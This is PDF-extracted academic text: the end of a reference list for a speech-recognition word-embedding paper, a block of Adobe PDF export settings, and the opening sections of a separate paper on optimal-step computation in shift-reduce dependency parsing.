input interfaces. In: INTERSPEECH 2005—Eurospeech, 9th European Conference on Speech Communication and Technology. September 4–8, 2005, Lisbon, 133–136. Onishi T, Utiyama M, Sumita E. 2011. Paraphrase lattice for statistical machine translation. IEICE Transactions on Information and Systems 94(6):1299–1305 DOI 10.1587/transinf.e94.d.1299. Pennington J, Socher R, Manning C. 2014. Glove: global vectors for word representation. In: Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing, EMNLP 2014. October 25–29, 2014. Doha: A meeting of SIGDAT, a Special Interest Group of the ACL, 1532–1543. Povey D, Ghoshal A, Boulianne G, Burget L, Glembek O, Goel N, Hannemann M, Motlicek P, Qian Y, Schwarz P, Silovsky J, Stemmer G, Vesely K. 2011. The kaldi speech recognition Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 47/49 http://dx.doi.org/10.1006/csla.2000.0152 http://arxiv.org/abs/1309.4168 http://dx.doi.org/10.1587/transinf.e94.d.1299 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ toolkit. In: IEEE 2011 Workshop on Automatic Speech Recognition and Understanding, December 2011. Piscataway: IEEE Signal Processing Society. Qiu S, Cui Q, Bian J, Gao B, Liu T-Y. 2014. Co-learning of word representations and morpheme representations. In: COLING 2014, 25th International Conference on Computational Linguistics, Proceedings of the Conference. August 23–29, 2014. Dublin: Technical Papers, 141–150. Quirk C, Brockett C, Dolan W. 2004. Monolingual machine translation for paraphrase generation. In: Proceedings of the 2004 Conference on Empirical Methods in Natural Language Processing EMNLP 2004, A meeting of SIGDAT, a Special Interest Group of the ACL, held in conjunction with ACL 2004. 25–26 July 2004, Barcelona, 142–149. Rosti A-V, Ayan NF, Xiang B, Matsoukas S, Schwartz R, Dorr B. 2007a. Combining outputs from multiple machine translation systems. In: Human Language Technology Conference of the North American Chapter of the Association of Computational Linguistics, Proceedings. April 22– 27, 2007, Rochester, 228–235. Rosti A-V, Matsoukas S, Schwartz R. 2007b. Improved word-level system combination for machine translation. In: ACL 2007, Proceedings of the 45th Annual Meeting of the Association for Computational Linguistics. June 23–30, 2007, Prague. Sagae K, Lehr M, Prud’hommeaux E, Xu P, Glenn N, Karakos D, Khudanpur S, Roark B, Saraclar M, Shafran I, Bikel D, Callison-Burch C, Cao Y, Hall K, Hasler E, Koehn P, Lopez A, Post M, Riley D. 2012. Hallucinated n-best lists for discriminative language modeling. In: 2012 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP). Piscataway: IEEE, 5001–5004. Schnabel T, Labutov I, Mimno D, Joachims T. 2015. Evaluation methods for unsupervised word embeddings. In: Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing, EMNLP 2015. September 17–21, 2015, Lisbon, 298–307. Schroeder J, Cohn T, Koehn P. 2009. Word lattices for multi-source translation. In: EACL 2009, 12th Conference of the European Chapter of the Association for Computational Linguistics, Proceedings of the Conference. March 30—April 3, 2009, Athens, 719–727. Schultz T, Jou S-C, Vogel S, Saleem S. 2004. Using word latice information for a tighter coupling in speech translation systems. In: INTERSPEECH 2004—ICSLP, 8th International Conference on Spoken Language Processing. October 4–8, 2004, Jeju Island. Seigel MS, Woodland PC. 2011. Combining information sources for confidence estimation with CRF models. In: INTERSPEECH 2011, 12th Annual Conference of the International Speech Communication Association. August 27–31, 2011, Florence, 905–908. Shivakumar PG, Li H, Knight K, Georgiou P. 2018. Learning from past mistakes: improving automatic speech recognition output via noisy-clean phrase context modeling. APSIPA Transactions on Signal and Information Processing 8:e8 DOI 10.1017/atsip.2018.31. Soricut R, Och F. 2015. Unsupervised morphology induction using word embeddings. In: NAACL HLT 2015, The 2015 Conference of the North American Chapter of the Association for Computational Linguistics. May 31–June 5, 2015. Denver: Human Language Technologies, 1627–1637. Sperber M, Neubig G, Niehues J, Waibel A. 2017. Neural lattice-to-sequence models for uncertain inputs. In: Proceedings of the 2017 Conference on Empirical Methods in Natural Language Processing, EMNLP 2017. September 9–11, 2017, Copenhagen, 1380–1389. Su J, Tan Z, Xiong D, Ji R, Shi X, Liu Y. 2017. Lattice-based recurrent neural network encoders for neural machine translation. In: Proceedings of the Thirty-First AAAI Conference on Artificial Intelligence. February 4–9, 2017, San Francisco, 3302–3308. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 48/49 http://dx.doi.org/10.1017/atsip.2018.31 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ Sundermeyer M, Tüske Z, Schlüter R, Ney H. 2014. Lattice decoding and rescoring with long- span neural network language models. In: INTERSPEECH 2014, 15th Annual Conference of the International Speech Communication Association. September 14–18, 2014, Singapore, 661–665. Tai KS, Socher R, Manning CD. 2015. Improved semantic representations from tree-structured long short-term memory networks. In: Proceedings of the 53rd Annual Meeting of the Association for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing of the Asian Federation of Natural Language Processing, ACL 2015. July 26–31, 2015. Vol. 1. Beijing: Long Papers, 1556–1566. Tan QF, Audhkhasi K, Georgiou PG, Ettelaie E, Narayanan SS. 2010. Automatic speech recognition system channel modeling. In: INTERSPEECH 2010, 11th Annual Conference of the International Speech Communication Association. September 26–30, 2010, Makuhari, Chiba, 2442–2445. Tan Z, Su J, Wang B, Chen Y, Shi X. 2018. Lattice-to-sequence attentional neural machine translation models. Neurocomputing 284:138–147 DOI 10.1016/j.neucom.2018.01.010. Tur G, Wright J, Gorin A, Riccardi G, Hakkani-Tür D. 2002. Improving spoken language understanding using word confusion networks. In: 7th International Conference on Spoken Language Processing, ICSLP2002 INTERSPEECH 2002, September 16–20, 2002, Denver. Wahlster W. 2013. Verbmobil: foundations of speech-to-speech translation. Berlin, Heidelberg: Springer Science & Business Media. Weide R. 1998. The CMU pronunciation dictionary, release 0.6. Available at http://www.speech.cs. cmu.edu/cgi-bin/cmudict. Wuebker J, Ney H. 2012. Phrase model training for statistical machine translation with word lattices of preprocessing alternatives. In: Proceedings of the Seventh Workshop on Statistical Machine Translation, WMT@NAACL-HLT 2012. June 7–8, 2012, Montreal, 450–459. Xing C, Wang D, Zhang X, Liu C. 2014. Document classification with distributions of word vectors. In: Signal and Information Processing Association Annual Summit and Conference (APSIPA), 2014 Asia-Pacific. Piscataway: IEEE, 1–5. Xiong W, Droppo J, Huang X, Seide F, Seltzer M, Stolcke A, Yu D, Zweig G. 2016. Achieving human parity in conversational speech recognition. arXiv preprint Available at http://arxiv.org/abs/1610.05256. Xu H, Povey D, Mangu L, Zhu J. 2011. Minimum bayes risk decoding and system combination based on a recursion for edit distance. Computer Speech & Language 25(4):802–828 DOI 10.1016/j.csl.2011.03.001. Xu P, Roark B, Khudanpur S. 2012. Phrasal cohort based unsupervised discriminative language modeling. In: INTERSPEECH 2012, 13th Annual Conference of the International Speech Communication Association. September 9–13, 2012, Portland, 198–201. Xue J, Zhao Y. 2005. Improved confusion network algorithm and shortest path search from word lattice. In: Proceedings. (ICASSP’05). IEEE International Conference on Acoustics, Speech, and Signal Processing, 2005. Vol. 1. Piscataway: IEEE, 853–856. Yin W, Schütze H. 2016. Learning word meta-embeddings. In: Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers) Berlin: ACL. Available at http://aclweb.org/anthology/P/P16/P16-1128.pdf. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 49/49 http://dx.doi.org/10.1016/j.neucom.2018.01.010 http://www.speech.cs.cmu.edu/cgi-bin/cmudict http://www.speech.cs.cmu.edu/cgi-bin/cmudict http://arxiv.org/abs/1610.05256 http://arxiv.org/abs/1610.05256 http://dx.doi.org/10.1016/j.csl.2011.03.001 http://aclweb.org/anthology/P/P16/P16-1128.pdf http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ Confusion2Vec: towards enriching vector space word representations with representational ambiguities Introduction Motivation Case Study: Application to Automatic Speech Recognition Proposed Models Training Schemes Evaluation Methods Data and Experimental Setup Results Vector Space Analysis Discussion Potential Applications Conclusion Future Work Appendix flink15 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_jhkfg5u4x5dotecqjonxyj7sbq ---- Calculating the Optimal Step in Shift-Reduce Dependency Parsing: From Cubic to Linear Time Mark-Jan Nederhof School of Computer Science University of St Andrews, UK markjan.nederhof@googlemail.com Abstract We present a new cubic-time algorithm to calculate the optimal next step in shift-reduce dependency parsing, relative to ground truth, commonly referred to as dynamic oracle. Un- like existing algorithms, it is applicable if the training corpus contains non-projective struc- tures. We then show that for a projective training corpus, the time complexity can be improved from cubic to linear. 1 Introduction A deterministic parser may rely on a classifier that predicts the next step, given features extracted from the present configuration (Yamada and Matsumoto, 2003; Nivre et al., 2004). It was found that accuracy improves if the classifier is trained not just on configurations that correspond to the ground-truth, or ‘‘gold’’, tree, but also on configurations that a parser would typically reach when a classifier strays from the optimal predictions. This is known as a dynamic oracle.1 The effective calculation of the optimal step for some kinds of parsing relies on ‘arc-decomposibility’, as in the case of Goldberg and Nivre (2012, 2013). This generally requires a projective training cor- pus; an attempt to extend this to non-projective training corpora had to resort to an approxima- tion (Aufrant et al., 2018). It is known how to calculate the optimal step for a number of non- 1A term we avoid here, as dynamic oracles are neither oracles nor dynamic, especially in our formulation, which allows gold trees to be non-projective. Following, for example, Kay (2000), an oracle informs a parser whether a step may lead to the correct parse. If the gold tree is non-projective and the parsing strategy only allows projective trees, then there are no steps that lead to the correct parse. At best, there is an optimal step, by some definition of optimality. An algorithm to compute the optimal step, for a given configuration, would typically not change over time, and therefore is not dynamic in any generally accepted sense of the word. projective parsing algorithms, however (Gómez- Rodrı́guez et al., 2014; Gómez-Rodrı́guez and Fernández-González, 2015; Fernández-González Gómez-Rodrı́guez, 2018a); see also de Lhoneux et al. (2017). Ordinary shift-reduce dependency parsing is known at least since Fraser (1989); see also Nasr (1995). Nivre (2008) calls it ‘‘arc-standard parsing.’’ For shift-reduce dependency parsing, calculation of the optimal step is regarded to be difficult. The best known algorithm is cubic and is only applicable if the training corpus is projective (Goldberg et al., 2014). We present a new cubic-time algorithm that is also applicable to non-projective training corpora. Moreover, its architecture is modular, expressible as a generic tabular algorithm for dependency parsing plus a context-free grammar that expresses the allow- able transitions of the parsing strategy. This dif- fers from approaches that require specialized tabular algorithms for different kinds of parsing (Gómez-Rodrı́guez et al., 2008; Huang and Sagae, 2010; Kuhlmann et al., 2011). The generic tabular algorithm is interesting in its own right, and can be used to determine the opti- mal projectivization of a non-projective tree. This is not to be confused with pseudo-projectivization (Kahane et al., 1998; Nivre and Nilsson, 2005), which generally has a different architecture and is used for a different purpose, namely, to allow a projective parser to produce non-projective structures, by encoding non-projectivity into pro- jective structures before training, and then recon- structing potential non-projectivity after parsing. A presentational difference with earlier work is that we do not define optimality in terms of ‘‘loss’’ or ‘‘cost’’ functions but directly in terms of attain- able accuracy. This perspective is shared by Straka et al. (2015), who also relate accuracies of compet- ing steps, albeit by means of actual parser output and not in terms of best attainable accuracies. 283 Transactions of the Association for Computational Linguistics, vol. 7, pp. 283–296, 2019. Action Editor: Francois Yvon. Submission batch: 11/2018; Revision batch: 2/2019; Published 5/2019. c© 2019 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00268 by Carnegie Mellon University user on 06 April 2021 We further show that if the training corpus is projective, then the time complexity can be reduced to linear. To achieve this, we develop a new approach of excluding computations whose accuracies are guaranteed not to exceed the accu- racies of the remaining computations. The main theoretical conclusion is that arc-decomposibility is not a necessary requirement for efficient cal- culation of the optimal step. Despite advances in unrestricted non-projective parsing, as, for example, Fernández-González and Gómez-Rodrı́guez (2018b), many state-of- the-art dependency parsers are projective, as, for example, Qi and Manning (2017). One main practical contribution of the current paper is that it introduces new ways to train projective parsers using non-projective trees, thereby enlarging the portion of trees from a corpus that is available for training. This can be done either after applying optimal projectivization, or by computing optimal steps directly for non-projective trees. This can be expected to lead to more accurate parsers, especially if a training corpus is small and a large proportion of it is non-projective. 2 Preliminaries In this paper, a configuration (for sentence length n) is a 3-tuple (α,β,T) consisting of a stack α, which is a string of integers each between 0 and n, a remaining input β, which is a suffix of the string 1 · · · n, and a set T of pairs (a,a′) of integers, with 0 ≤ a ≤ n and 1 ≤ a′ ≤ n. Further, αβ is a subsequence of 0 1 · · · n, starting with 0. Integer 0 represents an artificial input position, not corresponding to any actual token of an input sentence. An integer a′ (1 ≤ a′ ≤ n) occurs as second element of a pair (a,a′) ∈ T if and only if it does not occur in αβ. Furthermore, for each a′ there is at most one a such that (a,a′) ∈ T . If (a,a′) ∈ T then a′ is generally called a dependent of a, but as we will frequently need concepts from graph theory in the remainder of this article, we will consistently call a′ a child of a and a the parent of a′; if a′ < a then a′ is a left child and if a < a′ then it is a right child. The terminology is extended in the usual way to include descendants and ancestors. Pairs (a,a′) will henceforth be called edges. For sentence length n, the initial configuration is (0, 1 2 · · · n,∅), and a final configuration is shift: (α, bβ, T) ` (αb, β, T) reduce left: (αa1a2, β, T) ` (αa1, β, T ∪{(a1,a2)}) reduce right: (αa1a2, β, T) ` (αa2, β, T ∪{(a2,a1)}), provided |α| > 0 Table 1: Shift-reduce dependency parsing. of the form (0,ε,T), where ε denotes the empty string. The three transitions of shift-reduce de- pendency parsing are given in Table 1. By step we mean the application of a transition on a particular configuration. By computation we mean a series of steps, the formal notation of which uses `∗, the reflexive, transition closure of `. If (0, 1 2 · · · n,∅) `∗ (0,ε,T), then T represents a tree, with 0 as root element, and T is projective, which means that for each node, the set of its descendants (including that node itself) is of the form {a,a + 1, . . . ,a′−1,a′}, for some a and a′. In general, a dependency tree is any tree of nodes labelled 0, 1, . . . , n, with 0 being the root. The score of a tree T for a sentence is the number of edges that it has in common with a given gold tree Tg for that sentence, or formally |T ∩Tg|. The accuracy is the score divided by n. Note that neither tree need be projective for the score to be defined, but in this paper the first tree, T , will normally be projective. Where indicated, also Tg is assumed to be projective. Assume an arbitrary configuration (α,β,T) for sentence length n and assume a gold tree Tg for a sentence of that same length, and as- sume three steps (α,β,T) ` (αi,βi,Ti), with i = 1, 2, 3, obtainable by a shift, reduce left or reduce right, respectively. (If β = ε, or |α| ≤ 2, then naturally some of the three transitions need to be left out of consideration.) We now wish to calculate, for each of i = 1, 2, 3, the maximum value of |T ′i ∩Tg|, for any T ′ i such that (αi,βi,Ti) `∗ (0,ε,T ′i ). For i = 1, 2, 3, let σi be this maximum value. The absolute scores σi are strictly speaking irrelevant; the relative values determine which is the optimal step, or which are the optimal steps, to reach a tree with the highest score. Note that |{i | σi = maxj σj}| is either 1, 2, or 3. In the remainder of this article, we find it more convenient to calculate σi −|T ∩Tg| for each i—or, in other words, gold edges that were previously found are left out of consideration. 284 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00268 by Carnegie Mellon University user on 06 April 2021 We can put restrictions on the set of allowable computations (α,β,T) `∗ (0,ε,T ∪ T ′). The left-before-right strategy demands that all edges (a,a′) ∈ T ′ with a′ < a are found before any edges (a,a′) ∈ T ′ with a < a′, for each a that is rightmost in α or that occurs in β. The strict left- before-right strategy in addition disallows edges (a,a′) ∈ T ′ with a′ < a for each a in α other than the rightmost element. The intuition is that a non-strict strategy allows us to correct mistakes already made: If we have already pushed other elements on top of a stack element a, then a will necessarily obtain right children before it occurs on top of the stack again, when it can take (more) left children. By contrast, the strict strategy would not allow these left children. The definition of the right-before-left strategy is symmetric to that of the left-before-right strategy, but there is no independent strict right-before- left strategy. In this paper we consider all three strategies in order to emphasize the power of our framework. It is our understanding that Goldberg et al. (2014) does not commit to any particular strategy. 3 Tabular Dependency Parsing We here consider context-free grammars (CFGs) of a special form, with nonterminals in N ∪(N`× Nr), for appropriate finite sets N, N`, Nr, which need not be disjoint. The finite set of terminals is denoted Σ. There is a single start symbol S ∈ N. Rules are of one of the forms: • (B,C) → a, • A → (B,C), • (B′,C) → A (B,C), • (B,C′) → (B,C) A, where A ∈ N, B,B′ ∈ N`, C,C′ ∈ Nr, a ∈ Σ. A first additional requirement is that if (B′,C) → A (B,C) is a rule, then (B′,C′) → A (B,C′), for any C′ ∈ Nr, is also a rule, and if (B,C′) → (B,C) A is a rule, then (B′,C′) → (B′,C) A, for any B′ ∈ N`, is also a rule. This justifies our notation of such rules in the remainder of this paper as (B′, ) → A (B, ) and ( ,C′) → ( ,C) A, respectively. These two kinds of 